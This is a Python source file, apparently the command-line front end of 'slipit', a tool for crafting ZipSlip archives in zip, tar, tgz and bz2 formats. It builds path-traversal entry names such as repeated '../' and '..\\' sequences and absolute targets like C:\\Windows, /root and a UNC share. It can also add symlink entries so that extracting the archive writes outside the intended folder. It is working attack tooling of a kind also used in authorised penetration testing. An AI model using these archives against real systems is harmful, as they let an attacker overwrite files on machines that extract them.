#!/usr/bin/env python3

from __future__ import annotations

import sys
import magic
import argparse
import traceback
from pathlib import Path
from slipit import ArchiveProvider


def get_traversals(args: argparse.Namespace, filename: str) -> list[str]:
    '''
    Builds the list of traversal payload names for a single file from the
    traversal related options of the argparse namespace. The namespace itself
    is not modified.

    The payloads depend on the selected mode (checked in this order):

        args.multi          three fixed absolute paths followed by forward
                            slash and backslash traversals for each count in
                            range(1, args.depth). Sequence, separator and
                            prefix are ignored in this mode.
        args.increment      one payload per count from args.increment up to
                            and including args.depth
        otherwise           a single payload using args.depth sequences

    Parameters:
        args        argparse namespace for the command line
        filename    filename within the archive

    Returns:
        list of traversal payloads (never empty, the program exits with
        status 1 if no payload could be created)
    '''
    separator = args.separator

    if args.sequence:
        sequence = args.sequence.replace('{sep}', separator)
    else:
        sequence = f'..{separator}'

    # Normalize the prefix on a local copy instead of writing it back to args.
    prefix = args.prefix

    if prefix and not prefix.endswith(separator):
        prefix += separator

    if args.multi:

        traversal_payloads = [
            f'C:\\Windows\\{filename}',
            f'\\\\10.10.10.1\\share\\{filename}',
            f'/root/{filename}',
        ]

        # NOTE(review): this range stops at depth - 1, whereas the increment
        # branch below includes depth itself - confirm this is intended.
        for count in range(1, args.depth):
            traversal_payloads.append('../' * count + filename)
            traversal_payloads.append('..\\' * count + filename)

    elif args.increment is not None:

        traversal_payloads = [
            sequence * count + prefix + filename
            for count in range(args.increment, args.depth + 1)
        ]

    else:
        traversal_payloads = [sequence * args.depth + prefix + filename]

    # Happens e.g. when --increment is larger than --depth.
    if not traversal_payloads:
        print("[-] Traversal payload list is empty. Wrong argument usage.")
        sys.exit(1)

    return traversal_payloads


def check_readable(files: list[str]) -> list[str]:
    '''
    Takes a list of filenames and checks whether each of them can be opened
    for reading. A warning is printed for every file that cannot be opened.
    If no readable file is left, an error is printed and the program exits
    with status 1.

    Parameters:
        files               filenames to check

    Returns:
        list of the filenames that could be opened, in their original order
    '''
    readable = []

    for file in files:

        try:
            # The file is only opened to probe access, nothing is read.
            with open(file, 'r'):
                pass

        except OSError:
            print(f'[!] Unable to open file: {file}')

        else:
            readable.append(file)

    if not readable:
        print('[-] No files left.')
        sys.exit(1)

    return readable


def get_provider(output_file: str) -> str:
    '''
    Looks up the archive provider that is responsible for the specified
    output file.

    The mime type of the output file is detected first and passed to
    ArchiveProvider.get_provider_mime. If the detection raises
    FileNotFoundError, the file extension is passed to
    ArchiveProvider.get_provider_ext instead.

    If neither lookup yields a provider, or if the detection raises
    IsADirectoryError, an error is printed and the script exits with
    status 1.

    NOTE(review): the return annotation says str, but the value returned is
    whatever the ArchiveProvider lookup yields - confirm and adjust.

    Parameters:
        output_file         path to the output file

    Returns:
        provider            result of the ArchiveProvider lookup
    '''
    detector = magic.Magic(mime=True)

    try:
        detected = detector.from_file(output_file)
        by_mime = ArchiveProvider.get_provider_mime(detected)

        if not by_mime:
            print(f'[-] Unsupported archive type: {detected}')
            sys.exit(1)

        return by_mime

    except FileNotFoundError:

        # Nothing to inspect yet, so fall back to the file extension.
        suffix = Path(output_file).suffix
        by_ext = ArchiveProvider.get_provider_ext(suffix)

        if not by_ext:
            print(f'[-] Unable to guess mimetype from file extesion: {suffix}')
            print('[-] Use the --archive-type option to specify the archive type.')
            sys.exit(1)

        return by_ext

    except IsADirectoryError:

        print('[-] Output path is an existing directory.')
        sys.exit(1)


# Command line interface of the script.
parser = argparse.ArgumentParser(
    description='slipit v1.0.1 - Utility for creating ZipSlip archives.',
)

# Positional arguments
parser.add_argument(
    'archive',
    help='target archive file',
)
parser.add_argument(
    'filename',
    nargs='*',
    help='filenames to include into the archive',
)

# Optional arguments
parser.add_argument(
    '--archive-type',
    dest='type',
    choices=['zip', 'tar', 'tgz', 'bz2'],
    help='archive type to use',
)
parser.add_argument(
    '--clear',
    action='store_true',
    help='clear the specified archive from traversal items',
)
parser.add_argument(
    '--debug',
    action='store_true',
    help='enable verbose error output',
)
parser.add_argument(
    '--depth',
    metavar='int',
    type=int,
    default=6,
    help='number of traversal sequences to use (default=6)',
)
parser.add_argument(
    '--increment',
    metavar='int',
    type=int,
    help='add incremental traversal payloads from <int> to depth',
)
parser.add_argument(
    '--overwrite',
    action='store_true',
    help='overwrite the target archive instead of appending to it',
)
parser.add_argument(
    '--prefix',
    metavar='string',
    default='',
    help='prefix to use before the file name',
)
parser.add_argument(
    '--multi',
    action='store_true',
    help='create an archive containing multiple payloads',
)
parser.add_argument(
    '--remove',
    metavar='name',
    help='remove files from the archive (glob matching)',
)
parser.add_argument(
    '--separator',
    metavar='char',
    default='\\',
    help='path separator (default=\\)',
)
parser.add_argument(
    '--sequence',
    metavar='seq',
    help='use a custom traversal sequence (default=..{sep})',
)
parser.add_argument(
    '--static',
    metavar='content',
    help='use static content for each input file',
)
parser.add_argument(
    '--symlink',
    metavar='target',
    help='add as symlink (only available for tar archives)',
)


def main():
    '''
    Command line entry point. Parses the arguments, determines the archive
    provider (from --archive-type if given, otherwise via get_provider) and
    performs the first matching action:

        --clear             call provider.clear_archive with the
                            '..<separator>' payload
        --remove            call provider.remove_files with the given name
        no filenames        call provider.list_archive
        otherwise           open (or, with --overwrite, create) the archive
                            and append every input file under the names
                            returned by get_traversals

    When neither --static nor --symlink is used, the input files are
    filtered by check_readable first and only the readable ones are added.

    The provider is determined before the try block, so exceptions raised
    while determining it are not handled here.

    Exit codes set by this function:
        0       success
        1       FileNotFoundError was raised
        2       NotImplementedError was raised
        3       any other exception was raised
    '''
    archive = None
    error_code = 0
    args = parser.parse_args()
    provider = ArchiveProvider.get_provider_ext('.' + args.type) if args.type else get_provider(args.archive)

    try:
        if args.clear:
            payload = f'..{args.separator}'
            provider.clear_archive(args.archive, payload)
            return

        if args.remove:
            provider.remove_files(args.archive, args.remove)
            return

        if not args.filename:
            provider.list_archive(args.archive)
            return

        # An empty string is valid static content, so test against None.
        use_static = args.static is not None
        files = args.filename

        if not use_static and not args.symlink:
            # Continue with the readable files only. check_readable exits
            # the program itself when none are left.
            files = check_readable(files)

        archive = provider.create(args.archive) if args.overwrite else provider.open(args.archive)

        for file in files:

            payloads = get_traversals(args, Path(file).name)

            if use_static:
                archive.append_blobs(args.static.encode('utf-8'), payloads)

            elif args.symlink:
                archive.append_symlinks(args.symlink, payloads)

            else:
                archive.append_files(file, payloads)

    except FileNotFoundError as e:
        print(f'[-] Unable to find the specified file: {e}')
        error_code = 1

    except NotImplementedError:
        print('[-] The requested feature is not implemented for the specified archive type.')
        error_code = 2

    except Exception as e:
        print('[-] Unexcepted exception occured.')
        print(f'[-] {e}')

        if args.debug:
            traceback.print_exc()

        error_code = 3

    finally:
        # Compare against None so the archive is closed regardless of how
        # the archive object evaluates in a boolean context.
        if archive is not None:
            archive.close_archive()

    sys.exit(error_code)


# Only run the command line interface when executed as a script, so that
# importing this module does not parse arguments or exit the interpreter.
if __name__ == '__main__':
    main()
